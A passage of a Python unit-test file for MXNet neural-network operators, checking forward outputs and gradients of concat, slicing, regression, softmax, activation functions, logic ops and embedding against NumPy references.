if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
